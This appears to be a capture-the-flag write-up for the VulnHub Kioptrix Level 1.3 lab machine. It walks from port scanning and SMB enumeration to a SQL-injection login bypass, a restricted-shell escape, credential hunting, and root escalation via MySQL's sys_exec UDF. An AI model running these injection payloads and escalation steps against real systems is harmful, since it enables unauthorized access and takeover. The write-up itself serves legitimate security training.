VulnHub: Kioptrix: Level 1.3 (#4)


  1. Network Discovery
nmap -sn

The machine ‘’ is the target.

2. Port scan

nmap -Pn -Pn -p1000-

There’re 4 ports: 22, 80, 139, 445.

3. OS and service scan

nmap -p 22,80,139,445 -A

4. Vuln scan

nmap -p 22,80,139,445 --script vuln

5. Nikto scan

nikto -h

6. Samba scan

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse

7. Access HTTP on port 80

View page source

Access directories

I found username and password from database.sql.

Try supplying in the form

username: johnpassword: 1234


8. I’ll try SQL injection

Username - ' or '1'='1
Password - ' or '1'='1

Another try w/ john

Username - john
Password - ' or '1'='1

Now, I have a username and password.

9. Access via SSH

ssh john@

Type ? to get what command I can use.


I need TTY shell.

echo os.system('/bin/bash')


whoamipwdls -la

10. Data hunting and exploitation

cat /etc/passwd

There’re 3 users.

Verify passwd permission

ls -la /etc/passwd

It’s belong to root.

Verify shadow permission

ls -la /etc/shadow

It’s belong to root.

cd /home/loneferretls -la

Not much useful

cd /home/robertls -la

Not much useful

Since I know that the HTTP site is connected w/ MySQL, I assumed that there must be username and password somewhere

I found them in /var/www/checklogin.php

Verify sudo

sudo -l

Verify SUID

find / -perm -u=s -type f 2>/dev/null


getcap -r / 2>/dev/null

Cron job

cat /etc/crontab

Running service

ps aux | grep "^root"

There’s an MySQL and I have its username and password.

Verify version

mysql --version

I can use UDF.

Verify gcc for further compling

which gcc

I don't have gcc.

Maybe there’s a udf file in the system, search it.

find / 2>>/dev/null | grep -i "udf"

Connect to mysql

mysql -u root -p

I will modify the current user, john, to be run any sudo command.

use mysql;select sys_exec('usermod -a -G admin john');exit


sudo -l

Change to root

sudo su -

Now I’m root.